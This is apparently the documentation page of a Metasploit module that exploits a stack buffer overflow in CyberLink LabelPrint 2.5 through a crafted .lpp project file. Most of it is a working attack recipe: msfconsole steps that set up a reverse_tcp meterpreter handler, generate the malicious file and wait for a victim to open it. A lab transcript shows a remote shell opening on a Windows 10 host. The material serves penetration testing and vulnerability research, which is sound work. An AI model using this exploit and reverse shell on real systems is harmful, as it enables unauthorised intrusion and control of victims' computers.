## Description

This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
The vulnerability is triggered when opening a .lpp project file containing overly long string characters
via open file menu. This results in overwriting a structured exception handler record and take over the
application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).

## Vulnerable Application

CyberLink LabelPrint v2.5, which is available with [Power2Go 12 Essential](https://www.cyberlink.com/downloads/trials/power2go-platinum/download_en_US.html)

## Verification Steps

1. `./msfconsole`
2. `use exploit/multi/handler`
3. `set payload windows/meterpreter/reverse_tcp`
4. `set lhost <lhost>`
5. `set exitonsession false`
6. `exploit -j`
7. `use windows/fileformat/cyberlink_lpp_bof`
8. `set lhost <lhost>`
9. `set target 2`
10. `exploit`
11. Copy file to Win10 host and open in vulnerable software
12. Get a shell

## Scenarios

### Tested Windows 10 x64 running CyberLink LabelPrint v2.5

```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 172.22.222.132:4444
use windows/fileformat/cyberlink_lpp_bof
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set lhost 172.22.222.132 
lhost => 172.22.222.132
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > set target 2
target => 2
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) > exploit

[*] Creating 'msf.lpp' file ...
[+] msf.lpp stored at /home/msfdev/.msf4/local/msf.lpp
msf5 exploit(windows/fileformat/cyberlink_lpp_bof) >
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.132:4444 -> 172.22.222.200:50522) at 2018-12-11 06:24:38 -0600
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit
```
